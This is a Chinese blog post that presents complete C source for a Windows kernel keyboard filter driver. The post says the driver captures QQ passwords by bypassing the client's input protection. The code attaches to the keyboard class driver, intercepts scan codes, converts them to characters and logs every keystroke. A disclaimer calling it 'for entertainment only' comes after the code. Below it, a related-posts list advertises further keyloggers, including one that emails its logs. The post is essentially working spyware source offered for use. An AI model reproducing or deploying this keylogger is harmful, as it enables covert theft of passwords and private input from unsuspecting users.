键盘记录器，可截获到 QQ 的密码

由于 QQ 密码做了特殊的保护，所以通过远程注入得到密码框内容以及通过钩子来得到键盘消息均不能探测到 QQ 的密码，但是通过对键盘驱动的过滤却是可以记录下 QQ 密码输入期间的内容，附上源码。

#define DBG 1#include <ntddk.h>
#include <ntstrsafe.h>#include "KeyMonitor.h"extern POBJECT_TYPE IoDriverObjectType;PIO_STACK_LOCATION g_islCompletion;
int g_caps, g_shift, g_num;unsigned char asciiTbl[]={0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //normal0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, //caps0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //shift0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E,0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, //caps + shift0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,0x32, 0x33, 0x30, 0x2E
};NTSTATUS
ObReferenceObjectByName (__in PUNICODE_STRING ObjectName,__in ULONG Attributes,__in_opt PACCESS_STATE AccessState,__in_opt ACCESS_MASK DesiredAccess,__in POBJECT_TYPE ObjectType,__in KPROCESSOR_MODE AccessMode,__inout_opt PVOID ParseContext,__out PVOID *Object);VOID KMUnload(IN PDRIVER_OBJECT pDriverObject);
NTSTATUS KMUnHandleIrp(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMOpenClose(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMPnp(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMPower(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMAddDevice(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath);
NTSTATUS KMRead(DEVICE_OBJECT *DeviceObject, IRP *Irp);
NTSTATUS KMReadCompletion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
void KMPrintKey(UCHAR sch);NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath)
{int i = 0;KdPrint(("This is my driver, Henzox!\n"));pDriverObject->DriverUnload = KMUnload;for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION + 1; i++) {pDriverObject->MajorFunction[i] = KMUnHandleIrp;} pDriverObject->MajorFunction[IRP_MJ_CREATE] = KMOpenClose;pDriverObject->MajorFunction[IRP_MJ_CLOSE] = KMOpenClose;pDriverObject->MajorFunction[IRP_MJ_PNP] = KMPnp;pDriverObject->MajorFunction[IRP_MJ_POWER] = KMPower;pDriverObject->MajorFunction[IRP_MJ_READ] = KMRead;return KMAddDevice(pDriverObject, puServiceRegPath);
}VOID KMUnload(IN PDRIVER_OBJECT pDriverObject)
{PDEVICE_OBJECT tmpDevice;PMY_DEVICE_EXTENSION myDeviceExtension;KdPrint(("The unload function is invoked!\n"));tmpDevice = pDriverObject->DeviceObject;while (tmpDevice) {PDEVICE_OBJECT nextDevice;KdPrint(("delete devobj: 0x%p.\n",tmpDevice));myDeviceExtension = (PMY_DEVICE_EXTENSION)tmpDevice->DeviceExtension;// 如果还有完成例程没有执行，则取消掉这个完成例程if (myDeviceExtension->IslCompletion) {myDeviceExtension->IslCompletion->CompletionRoutine = NULL;// 只去掉与完成例程相关的几个标志位，栈内的其它标志位非常重要，不能去除myDeviceExtension->IslCompletion->Control &= ~(SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_CANCEL | SL_INVOKE_ON_ERROR);}IoDetachDevice(myDeviceExtension->AttachedTo);nextDevice = tmpDevice->NextDevice;IoDeleteDevice(tmpDevice);tmpDevice = nextDevice;}
}NTSTATUS KMUnHandleIrp(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{KdPrint(("Irp: %d\n", IoGetCurrentIrpStackLocation(Irp)->MajorFunction));IoSkipCurrentIrpStackLocation(Irp);return IoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);
}NTSTATUS KMOpenClose(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{KdPrint(("KMOpenClose.\n"));Irp->IoStatus.Status = STATUS_SUCCESS;Irp->IoStatus.Information = 0;IoCompleteRequest(Irp, IO_NO_INCREMENT);return STATUS_SUCCESS;
}NTSTATUS KMPnp(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{PIO_STACK_LOCATION pIo = IoGetCurrentIrpStackLocation(Irp);KdPrint(("KMPnp.\n"));switch (pIo->MinorFunction) {default:IoSkipCurrentIrpStackLocation(Irp);IoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);break;}return STATUS_SUCCESS;
}NTSTATUS KMPower(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{KdPrint(("KMPower.\n"));IoSkipCurrentIrpStackLocation(Irp);PoStartNextPowerIrp(Irp);return PoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);
}NTSTATUS KMAddDevice(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath)
{UNICODE_STRING usObjectName;PDRIVER_OBJECT KbdDriver;NTSTATUS status;PDEVICE_OBJECT tmpDevice, myDevice;UNICODE_STRING usDeviceName;WCHAR buff[64];int index = 0;PMY_DEVICE_EXTENSION DeviceExtension;RtlInitUnicodeString(&usObjectName, L"\\Driver\\KbdClass");status = ObReferenceObjectByName(&usObjectName,OBJ_CASE_INSENSITIVE,NULL,0,IoDriverObjectType,KernelMode,NULL,(PVOID)&KbdDriver);if (!NT_SUCCESS(status)) {KdPrint(("Find the kbd class failed!\n"));return status;}tmpDevice = KbdDriver->DeviceObject;while (tmpDevice) {swprintf(buff, L"\\Device\\MyDevice%d", index++);RtlInitUnicodeString(&usDeviceName, buff);status = IoCreateDevice(pDriverObject,sizeof(MY_DEVICE_EXTENSION),&usDeviceName,tmpDevice->DeviceType,tmpDevice->Characteristics,FALSE,&myDevice);if (!NT_SUCCESS(status)) {ObDereferenceObject(KbdDriver);return status;}KdPrint(("devobj: 0x%p.\n",myDevice));IoAttachDeviceToDeviceStack(myDevice, tmpDevice);DeviceExtension = (PMY_DEVICE_EXTENSION)myDevice->DeviceExtension;DeviceExtension->AttachedTo = tmpDevice;/* Setup my device */myDevice->StackSize = tmpDevice->StackSize + 1;myDevice->Flags |= (tmpDevice->Flags & (DO_BUFFERED_IO));          // 在 IoCreateDevice 时 Flags 会被赋于一些标志，这里应该保留这些标志，（如 DO_DEVICE_HAS_NAME 等，牵涉到引用计数）tmpDevice = tmpDevice->NextDevice;}ObDereferenceObject(KbdDriver);return STATUS_SUCCESS;
}NTSTATUS KMRead(DEVICE_OBJECT *DeviceObject, IRP *Irp)
{PMY_DEVICE_EXTENSION myDeviceExtension;//KdPrint(("KMRead.\n"));myDeviceExtension = (PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension;IoCopyCurrentIrpStackLocationToNext(Irp);/* 只有驱动可以保证在完成例程被调用之前不被卸载的情况下，可以使用 IoSetCompletionRoutine,如果你不能保证，那么就需要用 IoSetCompletionRoutineEx，让内核来使驱动不被卸载*//*IoSetCompletionRoutine(Irp,KMReadCompletion,NULL,TRUE,TRUE,TRUE);*/IoSetCompletionRoutineEx(DeviceObject,Irp,KMReadCompletion,NULL,TRUE,TRUE,TRUE);myDeviceExtension->IslCompletion = IoGetNextIrpStackLocation(Irp);return IoCallDriver(((PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension)->AttachedTo, Irp);
}NTSTATUS KMReadCompletion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{PMY_DEVICE_EXTENSION myDeviceExtension;PUCHAR buff;int len;//KdPrint(("KMReadCompletion: Key--0x%p\n", *(PULONG)Irp->AssociatedIrp.SystemBuffer));/* 该次 IRP 的完成例程已执行，栈会在该函数执行完时自动清空，所以不应该在引用该栈 */myDeviceExtension = (PMY_DEVICE_EXTENSION)DeviceObject->DeviceExtension;myDeviceExtension->IslCompletion = NULL;if (NT_SUCCESS(Irp->IoStatus.Status)) {// 由于设备标志为 DO_BUFFERED_IO, 内核分配了该缓冲区buff = Irp->AssociatedIrp.SystemBuffer;// 返回值一般都保存在 Information 中，即长度len = Irp->IoStatus.Information;if (buff[4] == 0) {/* 键盘被按下 */switch (buff[2]) {case 0x3A:g_caps = (g_caps == 1)?0:1;break;case 0x2A:case 0x36:g_shift = 1;break;case 0x45:g_num = (g_num == 1)?0:1;break;default:KMPrintKey(buff[2]);break;}} else if (buff[4] == 1) {/* 键盘被释放 */switch (buff[2]) {case 0x2A:case 0x36:g_shift = 0;break;default: break;}}}if (Irp->PendingReturned) {IoMarkIrpPending(Irp);}return Irp->IoStatus.Status;
}void KMPrintKey(UCHAR sch)
{UCHAR ch = 0;if ((sch < 0x47) || ((sch >= 0x47 && sch < 0x54) && g_num==0)) {ch = asciiTbl[sch];if(g_shift && g_caps)ch = asciiTbl[sch+84*3];else if(g_shift==1)ch = asciiTbl[sch+84*2];else if(g_caps==1)ch = asciiTbl[sch+84];}if(ch==0x08){//DbgPrint("退格");}if (ch >= 0x20 && ch < 0x7F){DbgPrint("%C",ch);}
}

键盘映射表来源于网络。整段代码仅供娱乐使用。

键盘记录器，可截获到 QQ 的密码相关推荐

linux系统键盘记录器,可截获到 QQ 密码键盘记录器源码
由于 QQ 密码做了特殊的保护,所以通过远程注入得到密码框内容以及通过钩子来得到键盘消息均不能探测到 QQ 的密码,但是通过对键盘驱动的过滤却是可以记录下 QQ 密码输入期间的内容,附上源码. #de ...
矛与盾:用VB打造驱动级键盘记录器,能过QQ密码框(源码)
信息监控与隐私保护永远是一对矛盾,在对付各种信息窃取软件上,新技术总是层出不穷.本文介绍一种古老的键盘记录器技术,确实很古老,DOS时代人们就在用了,但是现在它仍然很有效,在键盘过滤驱动失效的情况下, ...
键盘记录工具的制作 qq密码键盘记录器
现在的计算机键盘除开传统的PS/2键盘以外另有USB键盘,本文只先容普通的PS/2键盘,是以本文的举出例子代码也只撑持PS/2键盘,对USB键盘无效.我们懂得计算机使得到键盘的信息,必需与键盘举行通信 ...
手把手教你用SetWindowsHookEx做一个键盘记录器
"无忌,我教你的还记得多少?" "回太师傅,我只记得一大半." "那,现在呢?" "已经剩下一小半了." "那 ...
使用Python实现键盘记录器和邮箱自动通知
文章目录键盘记录器参考 (1)键盘记录器-模块实现 (2)发送邮箱-模块实现 (3)模块合并键盘记录器参考 <python:搞事情!键盘记录并截屏>, 地址https://ba ...
Android设备新型恶意软件，融合银行木马、键盘记录器和移动勒索软件等功能
2019独角兽企业重金招聘Python工程师标准>>> 网络犯罪分子目前正在开发一种针对Android设备的新型恶意软件,它融合了银行木马.键盘记录器和移动勒索软件的功能. 根据来自 ...
python键盘记录器_使用Python设计键盘记录器
在这里,我们将使用python开发键盘记录程序.但是在此之前,什么是键盘记录程序?键盘记录器是一个程序,我们使用它来监视击键.这些击键将存储在日志文件中.我们可以使用此按键记录敏感信息,例如用户名和密 ...
深入理解黑客攻击-键盘记录器
老师是这样讲的在计算机早期,计算机是没有鼠标的,键盘才是标配,可以没有鼠标,但是不能没有键盘所以,当键盘插进电脑上的时候,电脑应该是没有硬件提示的所以,一般在网吧里面,我们在插键盘的usb插孔里 ...
kali安装keylogger_小白日记48：kali渗透测试之Web渗透-XSS（二）-漏洞利用-键盘记录器，xsser...
XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上服务器:kali 客户端启动apache2服务:ser ...

键盘记录器，可截获到 QQ 的密码

键盘记录器，可截获到 QQ 的密码相关推荐

最新文章

热门文章